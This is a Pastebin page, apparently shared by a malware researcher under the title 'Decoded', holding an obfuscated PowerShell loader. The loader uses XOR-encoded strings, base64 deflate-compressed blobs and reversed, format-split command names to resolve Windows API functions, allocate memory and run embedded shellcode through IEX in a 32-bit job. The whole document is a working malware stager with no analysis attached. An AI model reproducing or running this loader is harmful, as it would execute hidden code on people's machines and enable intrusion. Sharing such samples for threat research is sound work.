API tools faq
paste
Advertisement
James_inthe_box

Decoded

James_inthe_box
Feb 11th, 2019
481
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.22 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Set-StrictMode -Version 2
  3. $DoIt = @'
  4. function func_get_proc_address {
  5. Param ($var_module, $var_procedure)
  6. ('108Y100m108m34m9G27~97&3P14>38@9}47&56~108}37@3Y98}47}3}33>60&62>41}63,63Y5@3,2@98~8@9~42,0G13m56,41Y63>24@62m41&45~33&100P108&23Y5G35>98}1P41&33}3>62Y21&31Y24Y62P41Y13G1}17G23P63>21&31G56Y9m33,98&15}3@34P58&41Y62~24@17&118Y118G42}62m3,1m46&45&31m9P122P120G31&56>30@5&2&43&100>107Y20m26P30&56G46m121G60Y43G10~28Y126m103&22P28}103G14G11m8}1G43,7P122m24&24G40}57P57}122G0P14&32&24m57Y60}61m61,2P10&14}56~10>33@57}120,7m10}41~32P120,126G126>116G126&14~38Y11~42}117P103P117,43}10}27P46&53m15G28@59~127~6&40}54G54&38~124P28Y7,27G46&7@125~9@39&11@126Y63>0&20&14@25>32}116,58~14Y9}99Y37,58P126~2G7~13Y57>31>1}1,56m126G63m24}122>20~27~63}27>34m63@57P37@25P52@20>34~22P9P60G31P26,3>14}46@28&30Y15@126,3@103&124&22Y13m2&120&121>4}39Y21Y0G116}62m26Y125P63}4~24}8P56P28P0,31}124@10&40@35,36>45P14>32m120@25Y124>13@123P13P14&124P41>46>37&9,15Y125}53G61P10m123,125}31P24Y42P123G103&35~121@40&21&52&28~41Y126~34G38m117}24m53G36G26Y57}122,127G10m5Y43G6@4m122P57&11,53&11P26>58m0&121G57&117m31@45Y6&15@29&38m38,14~54P47P7>56G9@4@21&25>43~32Y7Y56~53}59}57Y11G38Y29,9}61G122P27m63,14,4}4,36~9,52@13m28~25Y125>62@24,10m14~39@26}2@27&15}29~35P61}59>3P59~33m127G124}14&53~26,22,103Y15>47Y124m126@30}127P3P21&53>121@9@14~22m47G47P56Y127~37Y33Y14@30>27m8,125G63@47>2Y6P35~31}38Y9m2@61>10Y20@45&61~56G117>24@14}45>45@9Y28&29>62G14@29~36@27@5,8G99@11@127P60m3P123Y125,21Y34&11G46}24@29,46m27>7m11}9,31~53&125,46&13~14&11@38G45m103@11Y52P24,60G22G26G15Y99}126Y58~41@53P13@29}34>52G122~9,57}27m22P116m33G32,103,15}7}29G120>99P31>116G10}121@35}122&42P4Y43m6,60}33P126P14&126&38@124>33P122~24P6P5P58>45P116G47~116,1@59>52>25~25}22&45}10m25>32G45~28,121@116}3@30@27>13m32m13@31@99m45@59P37}124G117P61m25,63}4>28,22>42G11P125@9}57m15P7Y125m58~2}7@53}116Y63}61~103}47P56~103G58}35G5P21Y57m31&54P32~6}9~53G40Y10>42m7&59&30@127~52Y121@53,53P30&7}35,52}20Y40G46Y32,39Y56Y0@61P99P53&24@46Y22Y36P10&123P15~1&38@125@123}21G123P42Y13>123G63~35~24P116}99P32m126m123@33~11>62>39&37@8~20}9P8G39m103~41Y4m124>124@46}6m37,10~21G54@43@124@121P36&15P27}46m5@56Y43@38&28&40m57~13m124}46m42@7,30m60G28>3&20>36}45Y45G5Y24&40~126&122~53P46@30~15G22,9G24P28&123Y60@57,43@33~32&45m24G99P126P41Y99}60@6G35~31}22~1}99P9m126@22P9,4&126@42G54~57G42&15P8~25@53,123&0@60}58&60>26m52,42G27G37m39&61Y0&123Y7~37&99}34,5>123@28@0P33&2&35}31}25m99>20m27&15Y26G124m42,24P20,35G7P39,10&60&34,33~9}31G52m30P41,121@35@6}62G8G125P45m13G39Y54G20~43@28>26@54G0@34P36}11~59~6&60>52~63>4G36m57,32m11,9,6Y9>39G59}53}121@3~29@60>41~15m54Y63m62}121@127P53@8~121,9P15&35G59@123}58,31Y27&125&37@54P10,1,99Y11}10&121&30>34m36>34P125&61,122~45Y63}6P32m24@36&121G28&126>27}103Y116@5~11@122P123P33,124P35&32P63Y103>103m3}60~11}5Y58~34G126&56G58>120&59P37G40>121P4>127>0Y9P33,43~31@60}20>26>61Y24>61P45m57@103@3,35,63,31P11&24G54>127,22&59P121m125m1,53P22&53~14&9@45,25&6@41@32,8~123m40}31@8}122P21}127~61G28@2Y27@117,52&99Y37}37m58,4~22~58@117>37@34&121~34}58&42}35,32Y0@10,37@0G9@26Y37Y121m126&1}53&14Y22~13,62~21P9,59>42@8P33>103G7m117G43,38Y121>35,103>11P33,22m41,28P57m58Y46Y20~6&15&11P120m117>122@40G10P46G29>127~31}46}13G40&47m41Y52G35,35Y1m52@124>26&57Y127m32Y15P35m8Y36}13@2}43&39Y27}42}30m34G15~4G32>41m43Y121G103,4,120G32~3P34G127m15}56G13}24}63Y59,3,38&24Y7}123,126P39@29~9,6&5,13~5&10G63,8>4}22,63m43@56>4~24P127@24~54,36~34P42Y116>113~107m101G108,96@23>5~35G98,15Y3G1Y28}62Y41G31P63G5>35G2>98>47P3}1G28&62,41>31~31P5,35G34~33~35G40G9,17Y118G118m8G41G15@35P1G28P30@41,31P31}101>48>108G42G35Y30&41@45Y15>36@108G55>108>34,9}27P97P3~14Y38,9m47P56>108>31,53G31,56,9Y33@98G5@35~98@31m24,30@41m13&33~30Y41,45G40,9Y30>100P104m19,108>96Y23Y56G9~20@24P98,9P34~15G35&8@5&2,43,17&118&118>45>63,47}5&37Y108,101}108Y49Y108Y101~98}30,41@45>8Y56G35P9&34P8}100,101~108P48@108&98P100G108>100~23,63&56>62Y37}34>11&17m104Y58,41G62}46>3~63}41~60}30G41P10P41P30P41@2P15&9@101,23G125m96,127>17m103>107,20&107P97m6>3>37m2Y107,107}101'.sPlit( '~@Y&G>m},P')|foReacH{ [cHAr]( $_ -bxOr'0x4C') } ) -JoiN '' |. ( $PsHomE[21]+$pSHOmE[30]+'x')
  7.  
  8. }
  9.  
  10. function func_get_delegate_type {
  11. Param (
  12. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
  13. [Parameter(Position = 1)] [Type] $var_return_type = [Void]
  14. )
  15.  
  16. ( New-oBJecT SYsTEm.io.StReaMREaDer( (New-oBJecT Io.COMpressION.DEFLaTeStrEAM( [sysTEm.iO.MEMorYstreAm][ConVERt]::FROMBasE64StRINg('dVXvb9pIEP1eqf/DyorOWCWoQEjanO6DAaexhElkG9QoqtjFHojvbIP8g8qy/L/fzK4NyUkn4Vksdt+8efNmYcxbM9bT4zfIh/oX/btu4Ctjr/7L0frV0+qvTT1s6lGjsesHXRyf9b4ePjkmLnZKe/HzJ2PsKl/eTSr2lzoJdHKI58YNAXxHDFy+NfVdU9809YQA61tCRtidXhAoZGIWgOfh9wifKseQWwnG6aKarnCN8SkGgn6IYVbYT8sBJDa+QTLIaNlh8PSWkWf515FvJViOthaZLbaxpX3R7rMRxsefSagZrPdaVKrMkeT2raM3lPS+UgHEkOmYLUX0E2V4kWn6ejJwYRdbM/zqR4d0EJiLhZ3+mB1op7Uk/sQYzjJd1WtucndTVM/WZruyeTwHtyHRevtZhF04CTcyt9iGGO4xLt4AY47PUPbFGGhrky9WoN3fa0HpZsCXPp/zJ0dEqTZQZYxlDUNiL8WNK6K6xTCHXZTCvEpF0oocmHmO9AZ2ejr8A73eHwpCHW4bAwGGJfy+ftr+jSRwx03T5lHemLQSAaFu42op4VEZCOg8KYNpSLMqL7BVLv2qGz1EGkskCaNJCGox7AVqRsKFc1xciaQbhtFHm3np3eQFq8/4KtWMwXs2l5KdQ1jGBEHUsWYClWVHUoV3BX/w9w4t7UByyCoH9x3IlASDea/qB7HgHjQy4/sjTKqKW1PwybXHj+iqwE5PLJC8Uh1p5xzirlKHcijg2+7ARLZxrI7NYpHnffZcbuMo6DMPREsQwj4z0zxqN5glKS7Fph2zWE4Ngr+22jtlXESByIsu+y/j86er+iSyDfcrLm0ZLXiItrxUOmnaOm6kKeZEmUZNGZ3e8iIrg+JAQ4hqvxdgcnGjapPUmSx5hCASMZoF+uwxCmFKDiEl912h7Zi5PlWAvXdHjz+dEJvvFWbK5zhJoUa9OZnu5kiDJRxucR8yr+mcMewuG+XWW1nAnlgXdnKUHgEqohAF+vQhFt1oy+H9P58w3S3TIkroeJ85ghDEHkI0qVSTmxnf+DTkU77iNl/g5db81zlqHImAI/m8HcJLQl2turTFuLuP1KzcdDfpRJljWnnRXo4eBiklrs+l5EY2KfpsHWVFKeh3tA/G314sh1p5e21i913wyyzdFPyFH61GysqVrpngDvgcsvxs//Md0+nhST1JSJKi1XKvbmqSEz664vzPcDYVIxFcIi1SaoKUl6h2sn7+lEGBDCVfukM5/kHJS3QRcuts11F7l+izDNRwHdXMXfIb/wI='),[SYStEm.IO.coMPressIOn.COmPrEsSIOnMoDE]::DEcOMpRess ) ), [SySteM.TeXt.enCOdIng]::ASCIi)).rEADtoEND()| &((VarIable '*mdr*').nAME[3,11,2]-join'')
  17. }
  18.  
  19. sEt-Item ("va"+"rIAb"+"l"+"E:K0EPaO") ( [TyPe]("{1}{2}{0}" -f'vERt','C','oN') ); set ("s8k5"+"P") ( [tyPe]("{1}{9}{6}{7}{3}{8}{2}{0}{4}{5}" -F'SSIon','s','SsIoN.compRe','Mp','mo','de','M.io.','cO','Re','YStE') ) ; sEt-vaRIABLe ("{0}{1}"-f 'XC','GUT') ( [tYpe]("{1}{2}{0}{3}" -f'.enCod','te','xt','ing') ) ; ${test} = (&("{2}{3}{1}{0}" -f 't','jEC','n','ew-Ob') ("{4}{5}{3}{2}{7}{1}{0}{8}{6}" -f 'Re','.DEfLaTesT','MpReSS','iO.CO','sys','tem.','m','ion','a')( [io.mEMorystrEaM] ( vaRIablE ("K0e"+"PA"+"O")).VALUe::("{0}{2}{1}{3}{4}" -f'fROmB','Se64Stri','A','N','g').Invoke( ("{30}{32}{16}{8}{2}{20}{7}{21}{13}{5}{18}{6}{9}{3}{15}{31}{0}{19}{29}{34}{33}{23}{26}{12}{24}{28}{22}{4}{25}{10}{1}{11}{14}{27}{17}" -f'cLmHplyd1wX5O8eV68NiCUciAJdkHIv','6TZi00EdkSUsDKxyeb8OkwFyj8540sbOdagLnmHoH6Vd','A9W6Z5e7NVrXOQxZyWxq3BCFpVxMN0OwgpRrrYY','wRxSld5','qZm32J6wDvBSh','WiuMWnk4','FCMD6v2QMSw8/e2PFimEXfmRq+rISLFGwE7dShUAxWCqIt3LZi8eSDu8pqROil','m','uarDbVc4','9dbQhu2sOhulNICSpxAGnfD1uUZ9p3IWChhxNXPjJiTRkfDJWv','VL0yrVZ7dDYzzHZSh1XhV2wpN848gdVWVVZ5QzsD2kH96y5zGM0HThReOB18KOtseYtWSeFkGYyXs3SrdRAOh6ZoeWcjEeAeWxTzk9UACg4SG+BKFIOdYcm3/TgtsgEvoeciUw','2qa','DS2zp1g8vjn','gS1F2C1ANmTDIAcRnqV1CmjMxL0D3dCo+SMvskNAbANZnCL','xtsd61a','DGTef1vaq5','28Adr','DNOmO+c9AHnxvzA8r8/','sNHs0R51jhTCykOpOACYfYnKwEeV','ErUm/YP31rqSMnOYJ+HyNR29C','iAP','GtnBIMhNPJOZhh4AH9lZVicQAqkjPEDFQz76JqfI/4aV','/Ijk4/fVXVHdd/39xRKevRjvynJAJKu','eTrLn0a9jANUTX7SP+aqwN8RMa1z','Uz47kIuU9TD7VPVfNII0tgr6lboiReagmBXb9nPFD36GhhIb3Go86','e2MbIDRvLnHlWBnHtT','q08Q+JVaMQHWovt9jPr2P83pTBTjr1dLw/sToi8JNh2','Ieznc+G','W5vK/JdtSut++2ew7i','9J1wk1QX+45q','LVPJEqo6EP0gF8iksniLILMMghCQXSAyyKgIAb/+xntfV51Kp8cMpxmvtgCVu9m3DraamjUJhUMR1bw5KEd8sZ4G4+Tn6aprJ1CTkuQnF+RFfdKshMb59d48AXy2faPWiBFcAJaprbzXbF','We2ueqcNgRkhs09eYfTvDtm/FB6e','kCfH1e1c52zUlm/6/zLz8XBCPZA54XPH7f4If1i','ajlBsdhkPP7aEJJU1/bpjZVTDs74fFqds0Ds5/3rhGBPV94JVcFU3QnFPz/r5520zzh3yWis/fSJ4g8AXla5Q6Em9rp7dQb','zbA4zdR0MQ5IDLMObjZkdansbj3')), ( vaRiAbLe ("S8K5"+"p") -VaL )::"DECompREss" ) | .("{2}{0}{1}"-f 'Ore','aCh','F'){ &("{2}{3}{1}{0}"-f'jECt','w-Ob','n','e') ("{0}{4}{2}{1}{3}{5}" -f 'SYsT','EaMRE','IO.STR','a','em.','Der')(${_}, ( lS ("{4}{2}{3}{1}{0}"-f 'uT','g','AbLE:','xc','vARI') ).vaLuE::"AScII")} | &("{0}{1}{2}"-f'fO','rEaC','H') {${_}.("{0}{1}" -f 'ReADtOe','nD').Invoke() })
  20.  
  21. $gWH = [TYPe]("{1}{2}{0}{3}" -f 'Em.COnVe','S','YsT','Rt') ; sEt-VarIABLE ("nT"+"A") ( [TYpe]("{6}{0}{2}{3}{7}{4}{1}{5}"-f'.','Mod','COMPrEs','siON.c','SSION','e','iO','oMpRE') ) ; sET-ItEm VariAbLe:6z3v ([TYpe]("{0}{1}{2}{3}{4}"-F 'SYSTeM.','T','e','XT.eNcod','Ing') ); &((.('gV') ("{1}{0}" -f '*','*Mdr'))."NAme"[3,11,2]-join'')( .("{2}{0}{1}" -f'-objE','cT','NeW') ("{6}{7}{4}{3}{8}{0}{1}{2}{5}" -f'.deF','LA','testrEa','MPRessIo','o.co','m','SYSteM.','I','n')([SystEm.iO.memOrystREAm] $GWH::("{2}{0}{1}" -f 'aSe','64sTRiNg','fRoMb').Invoke(("{7}{3}{0}{1}{5}{10}{9}{4}{8}{12}{11}{2}{6}"-f'BViA6u','L','kt','b','ibWyciv','C5JzdVzzs','LtEEAA==','UylLLIpPzk9JV','Kz3VK','y0q','8rS','S9dQKU','LE41MwkuKcrM')), $NTa::"DECOmpREss") |&("{3}{4}{0}{2}{1}"-f'cH-O','ct','BjE','foR','ea'){ .("{2}{0}{1}"-f'eW','-objEcT','N') ("{0}{4}{5}{3}{2}{6}{1}"-f 'sYstEM.','R','D','amReA','iO.STR','e','E')( ${_}, $6Z3v::"AScii" ) } | .("{2}{0}{3}{1}{4}"-f'RE','bJE','fO','aCh-O','CT'){ ${_}.("{1}{2}{0}"-f'tOeNd','REa','D').Invoke()})
  22.  
  23.  
  24. & ( $SHEllID[1]+$ShellId[13]+'x')( ( -JoIn[rEgex]::mAtcHEs( ")''niOJ-'x'+]3,1[)(GnIRTSoT.ecnERefErpeSObReV$ ( . |)69]Rahc[,)711]Rahc[+701]Rahc[+66]Rahc[( EcAlpEr- 43]Rahc[,'lFE'EcAlpEr-63]Rahc[,)221]Rahc[+811]Rahc[+911]Rahc[( ECALPeRc- 93]Rahc[,'Lwg'EcAlpEr- )')lFEoRukBeZlF'+'E::eulav.) H54:ELBaiRav )LwgigLwg(. ( (lFEek'+'oVukBnIlFE.}'+'emukBNukBUR_ukBrAV{zvw
  25. )'+'))]dioV[( )]rtPtnI[(@ )LwgepyLwg,LwgfLwg,LwgeLwg,LwgagLwg,Lwgd_teg_cnuLwg,LwgelLwg,Lwgt_etLwgf-'+' lFE}6'+'{}0{}3{}1{}4{}2{}5{lFE(.( ,}refFUBukB_ukBRAv{zvw(lFEretNiOPukBNukBoiTukBcnuFroFE'+'TageLeukBdTukB'+'eGlFE::EULAv.) )Lwg0Lwg+Lwg8ZiL5:Lwg+LwgeLbAirAVLwg( )LwgigLwg(& ( = }emukBNuk'+'BuR_raV{zvw'+'
  26.  
  27. )lFEHTgukBNukBeLlFE.}edoukBc_ukBRaV{'+'zvw ,}rEFFU'+'ukBB_RukBAv{zvw ,0 ,}Edoc_RukBAukBV{zvw(ekovnI.)LwgypLwg,LwgoCLwg f- lFE}1{}0{lFE(::) Av- 08Zil5 )LwgeLLwg,LwgbLwg,LwgaIrAVLwgf- '+'lFE}'+'2{}1{}0{lFE(&(
  28.  
  29. )04x0 ,0003x0 ,lFEhtGukBNEukBllFE.}edoc'+'_RukBAuk'+'Bv'+'{zvw ,lFEore'+'ukBzlFE::EuLaV.) H54 )LwgEL'+'wg,'+'LwglBaIRaVLwg,Lwg-tegLwg f- lFE}2{}1{}0{lFE(. ( (lFEEKovNukBilFE.}Av_RukBAukBV{zvw = }reukBFfUukBBukB_RAV{zvw
  30.  
  31. )))'+']rtPtnI[( )]23tnIU[ ,]23tnIU[ ,]2'+'3tnIU[ ,]rtPtnI[(@ )LwgeLwg,Lwged_Lwg,LwgtegLwg,LwgtagelLwg,'+'Lwgepyt_Lwg'+',LwgfLwg,Lwg_cnuLwg f- lFE}2{}6{}3{}5{}4{}0{}1'+'{lFE(.( ,))LwguLwg,LwgcLwg'+',LwgollAlaLw'+'g,LwgtriVLwgf-lFE'+'}2{}1{}3{}0{lFE('+' )Lwglld.Lw'+'g,Lw'+'g'+'nLw'+'g,LwgrekLwg,Lwg23leLwgf- lFE}3{}0{}2{}1{lFE( )LwgrddLwg,LwgsseLw'+'g,Lwgg_cnufLwg,LwgeLwg,Lwga_corp_tLwg f- lFE}3{}4{}0{}1{}2{lFE(&((ekovnI.)LwgcLwg,LwgetnioLwg,LwgnuFroFetagelLwg,LwgrLwg,LwgPnoiLwg,LwgGLwg,LwgtLwg,LwgeLwg,LwgeDtLwgf- l'+'FE}5{}7{}4{}2{}8{}6{}0{}1{}3{lF'+'E(::)YLnoeUlaV- '+')lFE08zI'+'lFE+lFEllFE+lFE5lFE( )L'+'wgelbAIrLwg,Lwgv-tEgLwg,L'+'wgALwgf-lFE}2{}0'+'{}1{lF'+'E(. ( = }AVukB_ukBrAv{zvw;) )LwgTPTnILwg,LwgrLwgf- lFE}0{}'+'1{lFE'+'(]EPyT[ ( H5'+'4 )LwgVSLwg(& ;))LwgEspoRLwg,LwgLAHSraM.sLwg,LwgeTNi.eMiTnur.MLwg,LwgysLwg,LwgecLwg,LwgetS'+'Lwg,LwgIvRLwg F- lFE}5{}'+'2{}0{}6{}4{}1{}3{lFE(]EPyT[( )lFE08zilFE+lFEl5lFE( )LwgbaiRALwg,LwgV-tEsLwg,LwgelLw'+'gf-lFE'+'}0{}2{}1{lF'+'E(&'+' '(( ", '.','RIg'+'HTto'+'LE'+'ft') ) )
  32. '@
  33.  
  34. If ([IntPtr]::size -eq 8) {
  35. start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
  36. }
  37. else {
  38. IEX $DoIt
  39. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!